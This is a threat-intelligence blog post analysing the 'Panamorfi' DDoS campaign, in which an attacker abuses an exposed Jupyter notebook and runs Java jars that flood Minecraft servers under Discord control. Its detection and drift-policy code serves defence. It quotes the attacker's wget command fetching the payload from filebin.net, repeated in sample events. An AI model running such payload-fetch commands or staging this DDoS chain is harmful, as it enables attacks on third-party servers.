Panamorfi: A New Discord DDoS Campaign
Aqua Blog · Assaf Morag · August 2, 2024

Aqua Nautilus researchers uncovered a new Distributed Denial of Service (DDoS) campaign, dubbed 'Panamorfi', in which the threat actor launches a DDoS attack with mineping, a Java-written Minecraft DDoS package. Thus far we have only seen it deployed via misconfigured Jupyter notebooks. In this blog we explain the attack, the techniques used by the threat actor, and how to protect your environments.

Attack flow

The threat actor 'yawixooo' gained initial access to our internet-exposed Jupyter notebook honeypot and then ran the following command:

wget https://filebin.net/archive/h4fhifnlykw224h9/zip

This downloaded a zip file with the random name h4fhifnlykw224h9. The file was new on VirusTotal and had only one detection, by ESET. The zip (MD5: 42989a405c8d7c9cb68c323ae9a9a318) is ~17 MB in size and contains two Jar files.

Figure 1: The zip file with a single detection

The two Jar files were also new on VirusTotal, each with a single detection by ESET.

Figure 2: The conn.jar file with a single detection
Figure 3: The mineping.jar file with a single detection

The connector Jar file (conn.jar) contains the initial execution code. As depicted below in the main function, the threat actor uses Discord to control the DDoS attack: the victim machine connects to a Discord channel using the credentials specified in the code.

Figure 4: The main function of connector jar

conn.jar then loads mineping.jar, a known Minecraft server DDoS tool whose code is available on GitHub. The code loads the mineping.jar package in order to launch a TCP flood DDoS attack, which aims to exhaust the target server's resources by sending a large number of TCP connection requests. The results are written back to the Discord channel.
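The chain described above (a shell spawned from the notebook server pulls a zip from a file-drop site, unpacks it, and runs the unpacked jar with java -jar, while the zip's hash matches a known indicator) is what a behavioral runtime rule keys on. The following Python is an added example written for this page, not Aqua's detection logic: it assumes a generic per-container process-exec event stream (fields container, pid, ppid, argv and an optional file_md5 of a file the process wrote), all of whose events and field names are constructed here, and uses the zip's MD5 from the write-up as the only IOC.

```python
"""Behavioral detection for the Panamorfi chain over process-exec events.

Added example, not Aqua's detection logic. It assumes a generic per-container
exec-event stream (container, pid, ppid, argv, optional file_md5 of a file the
process wrote); the field names and the events below are constructed.
"""
from collections import defaultdict
from urllib.parse import urlparse

# IOC from the write-up: MD5 of the zip fetched from filebin.net.
IOC_MD5 = {"42989a405c8d7c9cb68c323ae9a9a318"}
# File-drop hosts a notebook kernel has no business pulling executables from
# (assumption for the example; tune the list to your environment).
DROP_SITES = {"filebin.net"}
DOWNLOADERS = {"wget", "curl"}

# Constructed, chronologically ordered sample events.
SAMPLE_EVENTS = [
    {"container": "jupyter-1", "pid": 20, "ppid": 1,
     "argv": ["jupyter-notebook", "--ip=0.0.0.0"]},
    {"container": "jupyter-1", "pid": 31, "ppid": 20,
     "argv": ["/bin/sh", "-c", "wget https://filebin.net/archive/h4fhifnlykw224h9/zip"]},
    {"container": "jupyter-1", "pid": 32, "ppid": 31,
     "argv": ["wget", "https://filebin.net/archive/h4fhifnlykw224h9/zip"],
     "file_md5": "42989a405c8d7c9cb68c323ae9a9a318"},
    {"container": "jupyter-1", "pid": 40, "ppid": 20, "argv": ["unzip", "zip"]},
    {"container": "jupyter-1", "pid": 41, "ppid": 20, "argv": ["java", "-jar", "conn.jar"]},
    # A benign notebook: installs a package and checks the JVM version.
    {"container": "jupyter-2", "pid": 20, "ppid": 1, "argv": ["jupyter-notebook"]},
    {"container": "jupyter-2", "pid": 50, "ppid": 20, "argv": ["pip", "install", "pandas"]},
    {"container": "jupyter-2", "pid": 51, "ppid": 20, "argv": ["java", "-version"]},
]


def stage_of(event):
    """Map one exec event to a chain stage: ("download", host), ("unpack", file),
    ("run_jar", jar) or None."""
    argv = event["argv"]
    comm = argv[0].rsplit("/", 1)[-1]
    if comm in DOWNLOADERS:
        for tok in argv[1:]:
            host = urlparse(tok).hostname
            if host in DROP_SITES:
                return ("download", host)
    if comm == "unzip" and len(argv) > 1:
        return ("unpack", argv[-1])
    if comm == "java" and "-jar" in argv:
        i = argv.index("-jar") + 1
        return ("run_jar", argv[i] if i < len(argv) else "?")
    return None


def detect(events):
    """One alert per container that downloads from a drop site and later runs a
    jar, or whose written files match an IOC hash. Events must be time-ordered."""
    per_container = defaultdict(lambda: {"stages": [], "ioc_hits": set()})
    for ev in events:
        state = per_container[ev["container"]]
        if ev.get("file_md5") in IOC_MD5:
            state["ioc_hits"].add(ev["file_md5"])
        stage = stage_of(ev)
        if stage:
            state["stages"].append(stage)
    alerts = []
    for container, state in per_container.items():
        names = [s[0] for s in state["stages"]]
        chained = False
        if "download" in names and "run_jar" in names:
            last_jar = len(names) - 1 - names[::-1].index("run_jar")
            chained = names.index("download") < last_jar
        if chained or state["ioc_hits"]:
            alerts.append({"container": container,
                           "stages": state["stages"],
                           "ioc_hits": sorted(state["ioc_hits"])})
    return alerts


if __name__ == "__main__":
    for alert in detect(SAMPLE_EVENTS):
        print(alert)
```

Two practical notes. The ppid field is carried but not used; a production rule should additionally require the downloader to descend from the notebook server process, so that an administrator's exec into the container is not mistaken for the kernel acting on an attacker's cell. And the hash match is the weakest signal here: the actor only has to repack the zip to defeat it, while the download-then-run-jar sequence survives repacking.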
Figure 5: The function that updates the Discord channel

The threat actor also identifies as 'yawixooo' in this function and loads a signature image, enclosed below.

Figure 6: The Panamorfi DDoS logo

The mineping.jar package contains 12 Java files that, among other things, open an HTTP socket, use a proxy, flood a victim, and generate random connection details.

The threat actor

The threat actor identified themselves in the code as 'yawixooo', a handle that can also be found on GitHub. At the time of our investigation the public repository appears to be active; it contains a Minecraft server configuration and an HTML page that is currently under construction.

Figure 7: The GitHub profile of the threat actor
Figure 8: The website of the threat actor under construction

Detection and remediation with Aqua's CNAPP

In this blog we covered an attack against a Jupyter notebook. These applications are typically used by data practitioners such as data engineers, data analysts and data scientists. From what we have seen, in both training and practice, security receives insufficient attention: data practitioners often lack the relevant knowledge and understanding, and so they sometimes leave room for misconfigurations or vulnerabilities.

In this case, we leveraged Aqua's Runtime Protection solution to detect the drift event and block its execution. Aqua's behavioral detection identifies malicious or suspicious behavior at runtime, and granular runtime policies block the events in real time.

While vulnerability management and misconfiguration remediation are important for an overall cloud native security posture, we must assume that an attacker can gain access by exploiting a zero-day or unpatched vulnerability or a misconfiguration. In this attack, the next link in the kill chain (after the misconfiguration) is the payload.
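The drift event referred to above is an attempt to execute something the image did not ship. What such a policy actually has to evaluate is shown in the following Python, an added example written for this page and not Aqua's implementation. It assumes an image manifest of path -> sha256 derived from the image layers, a live container filesystem, and a PATH search order; all three are constructed dicts and lists here. The one non-obvious point it demonstrates is that java itself is part of the image, so a check on the executed binary alone would wave conn.jar through; the check has to follow the interpreter to the jar (or script) it is told to run.

```python
"""Drift check: is what is about to execute shipped by the container image?

Added example, not Aqua's implementation. The image manifest (path -> sha256)
would come from the image layers at build or scan time; here the manifest, the
live filesystem and the search path are all constructed. Execution is allowed
only when every file whose content will run exists in the image with an
unchanged hash.
"""
import hashlib
import posixpath

SEARCH_PATH = ["/usr/local/bin", "/usr/bin", "/bin"]

# Interpreters whose argv names the file that really runs. The interpreter
# binary itself ships in the image, so checking argv[0] alone is not enough.
# Value: option that precedes the file, or None for the first positional arg.
INTERPRETERS = {"java": "-jar", "python": None, "python3": None}


def sha256(data):
    return hashlib.sha256(data).hexdigest()


# Constructed image content, and the live container after the attacker's
# wget + unzip dropped two jars into the notebook user's home directory.
IMAGE_CONTENT = {
    "/usr/bin/java": b"jvm launcher",
    "/usr/bin/python3": b"cpython",
    "/usr/bin/wget": b"wget",
    "/bin/sh": b"dash",
    "/usr/local/bin/jupyter-notebook": b"notebook",
    "/opt/app/etl.jar": b"shipped application jar",
}
IMAGE_MANIFEST = {path: sha256(content) for path, content in IMAGE_CONTENT.items()}
LIVE_FS = dict(IMAGE_CONTENT)
LIVE_FS["/home/jovyan/conn.jar"] = b"attacker connector jar"
LIVE_FS["/home/jovyan/mineping.jar"] = b"attacker ddos jar"


def resolve_path(name, cwd, fs, use_path):
    """Resolve a name the way execve would: absolute, via PATH (argv[0] without
    a slash), or relative to the working directory."""
    if name.startswith("/"):
        return posixpath.normpath(name)
    if use_path and "/" not in name:
        for d in SEARCH_PATH:
            candidate = posixpath.join(d, name)
            if candidate in fs:
                return candidate
    return posixpath.normpath(posixpath.join(cwd, name))


def executed_files(argv, cwd, fs, follow_interpreters=True):
    """Paths whose bytes will execute: the binary, plus the jar/script when the
    binary is a known interpreter."""
    files = [resolve_path(argv[0], cwd, fs, use_path=True)]
    base = posixpath.basename(files[0])
    if follow_interpreters and base in INTERPRETERS:
        flag = INTERPRETERS[base]
        target = None
        if flag is None:
            target = next((a for a in argv[1:] if not a.startswith("-")), None)
        elif flag in argv and argv.index(flag) + 1 < len(argv):
            target = argv[argv.index(flag) + 1]
        if target:
            files.append(resolve_path(target, cwd, fs, use_path=False))
    return files


def evaluate(argv, cwd, fs=LIVE_FS, manifest=IMAGE_MANIFEST, follow_interpreters=True):
    """Return ("allow", reason) or ("block", reason) for one exec attempt."""
    for path in executed_files(argv, cwd, fs, follow_interpreters):
        content = fs.get(path)
        if content is None:
            return ("block", f"{path}: not found")
        if path not in manifest:
            return ("block", f"{path}: not in image (drift)")
        if sha256(content) != manifest[path]:
            return ("block", f"{path}: modified since image build")
    return ("allow", "all executed files match the image")


if __name__ == "__main__":
    print(evaluate(["java", "-jar", "/opt/app/etl.jar"], "/home/jovyan"))
    print(evaluate(["java", "-jar", "conn.jar"], "/home/jovyan"))
    print(evaluate(["java", "-jar", "conn.jar"], "/home/jovyan", follow_interpreters=False))
```

Note what this does and does not catch. The wget that fetches the zip is allowed, because wget ships in the image; a drift policy on its own does nothing until the payload is executed, which is why the block lands on conn.jar, the link after the misconfiguration. And because conn.jar pulls mineping.jar into its own JVM rather than starting a new process, there is no second exec event to evaluate: the policy has to catch the first jar or it catches nothing.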
We assume that we can restrict our data practitioners from executing anything outside the scope of the Jupyter notebook, so we set our controls to block, as seen in Figure 9 below.

Figure 9: The Jupyter notebook container runtime policy is set to block any drift (an attempt to run an executable that is not in the original image)

As Figure 10 shows, the runtime policy blocks the file conn.jar from running, which de facto kills the entire attack.

Figure 10: Aqua's runtime protection completely blocks the attack before it even started

Published under: SECURITY RESEARCH
Tags: DevSecOps, Security Threats, Supply Chain Attacks

Assaf Morag
Assaf is the Director of Threat Intelligence at Aqua Nautilus. He is responsible for acquiring threat intelligence related to the software development life cycle in cloud native environments, supports the team's data needs, and helps Aqua and the ecosystem remain at the forefront of emerging threats and protective methodologies. His research has been featured in leading information security publications and journals worldwide, and he has presented at leading cybersecurity conferences. Notably, Assaf has also contributed to the development of the new MITRE ATT&CK Container Framework. Assaf leads an O'Reilly course on cyber threat intelligence in cloud-native environments, covering both theoretical concepts and practical applications.